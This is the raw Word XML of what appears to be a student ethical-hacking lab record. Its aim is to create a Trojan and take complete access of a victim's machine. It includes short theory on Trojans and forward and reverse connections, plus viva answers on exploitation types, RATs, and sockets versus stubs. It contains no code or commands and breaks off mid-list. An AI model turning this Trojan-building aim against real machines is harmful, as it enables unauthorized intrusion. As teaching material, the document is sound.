          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDA35FA" wp14:editId="749834D8">
            <wp:extent cx="5943600" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="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C8F9BA7" w14:textId="77777777" w:rsidR="00476C05" w:rsidRPr="001C411D" w:rsidRDefault="00476C05" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5327AE" w14:textId="77777777" w:rsidR="00476C05" w:rsidRPr="001C411D" w:rsidRDefault="00476C05" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D25FD6A" w14:textId="77777777" w:rsidR="00476C05" w:rsidRPr="001C411D" w:rsidRDefault="00476C05" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75779A5E" w14:textId="77777777" w:rsidR="00476C05" w:rsidRPr="001C411D" w:rsidRDefault="00476C05" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268BFFE6" w14:textId="77777777" w:rsidR="00462670" w:rsidRDefault="00462670">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6C5D1" w14:textId="6F36DB67" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00476C05" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">EXPERIMENT NO. </w:t>
      </w:r>
      <w:r w:rsidR="002C63F7" w:rsidRPr="001C411D">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E0E89" w:rsidRPr="001C411D" w14:paraId="36693EA4" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6136B1C6" w14:textId="77777777"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5623CC80" w14:textId="77777777" w:rsidR="00AE0E89" w:rsidRPr="001C411D" w:rsidRDefault="00AE0E89" w:rsidP="00AE0E89">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0E89" w:rsidRPr="001C411D" w14:paraId="17F5E079" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A4EED26" w14:textId="77777777"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30AA7FCE" w14:textId="77777777" w:rsidR="00AE0E89" w:rsidRPr="001C411D" w:rsidRDefault="00AE0E89" w:rsidP="00AE0E89">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0E89" w:rsidRPr="001C411D" w14:paraId="6044BAF4" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10EC73B8" w14:textId="77777777"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01BA39B6" w14:textId="77777777" w:rsidR="00AE0E89" w:rsidRPr="001C411D" w:rsidRDefault="00AE0E89" w:rsidP="00AE0E89">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0E89" w:rsidRPr="001C411D" w14:paraId="0AD58E53" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F72312D" w14:textId="1BAE88D3"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AE0E89" w:rsidRPr="001C411D" w14:paraId="7C9DB4DA" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11C3C66B" w14:textId="77777777"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4EE68589" w14:textId="77777777" w:rsidR="00AE0E89" w:rsidRPr="001C411D" w:rsidRDefault="00AE0E89" w:rsidP="00AE0E89">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE0E89" w:rsidRPr="001C411D" w14:paraId="6250FEBA" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E9FC074" w14:textId="77777777" w:rsidR="00AE0E89" w:rsidRPr="001C411D" w:rsidRDefault="00AE0E89" w:rsidP="00AE0E8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55275E14" w14:textId="77777777" w:rsidR="00AE0E89" w:rsidRPr="001C411D" w:rsidRDefault="00AE0E89" w:rsidP="00AE0E89">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58492120" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="001138A0">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138A0" w:rsidRPr="001C411D" w14:paraId="3AA6E0DA" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0888B6A0"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7FD2BE1C"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p w14:paraId="52D43BE5" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0"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exploitation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="330AA69F"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tc>
      </w:tr>
      <w:tr w:rsidR="001138A0" w:rsidRPr="001C411D" w14:paraId="70C8AD1F" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2F0CE2CA"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1C651FD3" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23D656B2" w14:textId="0ABBAEBE"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color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>The students will be able to gain access of target machine using Malware</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001138A0" w:rsidRPr="001C411D" w14:paraId="522DB207" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DA682E2"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57F8056C" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60F4DA99" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Create Trojan and Exploit victim’s machine by taking its complete access</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C72FBAC"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7B3E5E18" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E138764"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0E3DE0CC" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76E5A0F0" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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Trojans are the malicious applications or programs which looks like a normal application but is harmful in nature as it can give the whole remote access of the Target's Machine to the Attacker's Machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625C052E" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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E.g. Poke and take remote control of your machine</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F3FA86C" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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ways of remote connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="482D3AF5" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>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Forward Connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3BAF6F" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00CF046C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="11"/>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Reverse connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EC5F46A"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7C9E869C" w14:textId="77777777" w:rsidTr="00DE6919">
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22ACCBE3" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="00DE6919">
            <w:pPr>
              <w:spacing w:after="0"/>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5A167F08" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="001C411D" w:rsidRDefault="001138A0" w:rsidP="004B6E6C">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C143F42" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="004B6E6C" w:rsidRDefault="001138A0" w:rsidP="004B6E6C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B6E6C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">What are the </w:t>
            </w:r>
            <w:r w:rsidRPr="004B6E6C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>different types of Exploitation.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6470E6"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t>There are different types of exploitation techniques that attackers can use, including:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4BE85E"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p>
          <w:p w14:paraId="5D1E3C8E"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t>Code injection: This technique involves injecting malicious code into a system or application by exploiting vulnerabilities in the code, such as buffer overflows, SQL injection, or cross-site scripting (XSS) attacks. The injected code can then be used to execute arbitrary commands or gain unauthorized access to the system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C060EB1"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p>
          <w:p w14:paraId="3F6E86D9"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t>Privilege escalation: This technique involves exploiting vulnerabilities in a system to gain higher levels of privilege or access than are normally allowed. For example, an attacker may exploit a vulnerability in a web application to gain administrative privileges or use a zero-day exploit to gain root access to a system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E381810"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p>
          <w:p w14:paraId="18FFE080"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t>Social engineering: This technique involves manipulating people into divulging sensitive information or performing actions that can be exploited. For example, an attacker may use phishing emails or phone calls to trick users into giving away their login credentials or installing malware on their systems.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B545B4E"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p>
          <w:p w14:paraId="5E3F79C7"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lastRenderedPageBreak/>
              <w:t>Password attacks: This technique involves using automated tools or manual methods to guess or crack passwords used to protect access to a system. Password attacks can include brute-force attacks, dictionary attacks, and other methods of guessing or cracking passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442FBB35"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p>
          <w:p w14:paraId="762DBA04" w14:textId="77777777" w:rsidR="004B6E6C" w:rsidRPr="004B6E6C" w:rsidRDefault="004B6E6C" w:rsidP="004B6E6C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B6E6C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Man-in-the-middle (MITM) attacks: This technique involves intercepting and modifying network traffic between two parties to gain access to sensitive information or perform unauthorized actions. MITM attacks can be used to steal credentials, modify data, or inject malware into network traffic.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E5F8263" w14:textId="77777777" w:rsidR="004B6E6C" w:rsidRPr="004B6E6C" w:rsidRDefault="004B6E6C" w:rsidP="004B6E6C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1FCB894A" w14:textId="77777777" w:rsidR="001138A0" w:rsidRDefault="001138A0" w:rsidP="004B6E6C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B6E6C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Write a short note on RAT.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12FEC7FD" w14:textId="37027C8E" w:rsidR="004B6E6C" w:rsidRDefault="008C5923" w:rsidP="008C5923">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C5923">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>RAT (Remote Access Trojan) is a type of malware that provides attackers with unauthorized remote access and control over a victim's computer. RATs typically enter a system disguised as legitimate software or via phishing emails or drive-by downloads. Once installed, they create a backdoor on the victim's computer, allowing the attacker to remotely access and control the system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2946AADC" w14:textId="77777777" w:rsidR="008C5923" w:rsidRPr="008C5923" w:rsidRDefault="008C5923" w:rsidP="008C5923">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E5EAC34" w14:textId="77777777" w:rsidR="001138A0" w:rsidRPr="004B6E6C" w:rsidRDefault="001138A0" w:rsidP="004B6E6C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B6E6C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Differentiate between socket and stub.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D96C245" w14:textId="0CE8EE7A" w:rsidR="008C5923" w:rsidRDefault="00E756F1" w:rsidP="00E756F1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E756F1">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>A socket is a software endpoint that enables communication between networked applications, while a stub is a software component that provides a stand-in for a remote procedure or function call in a distributed system. While both sockets and stubs play important roles in network communication, they serve different functions and are used in different parts of the protocol stack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151DED91" w14:textId="77777777" w:rsidR="00E756F1" w:rsidRPr="00E756F1" w:rsidRDefault="00E756F1" w:rsidP="00E756F1">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="12BB771A" w14:textId="781E7E73" w:rsidR="00E756F1" w:rsidRPr="00160F8D" w:rsidRDefault="001138A0" w:rsidP="00160F8D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B6E6C">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
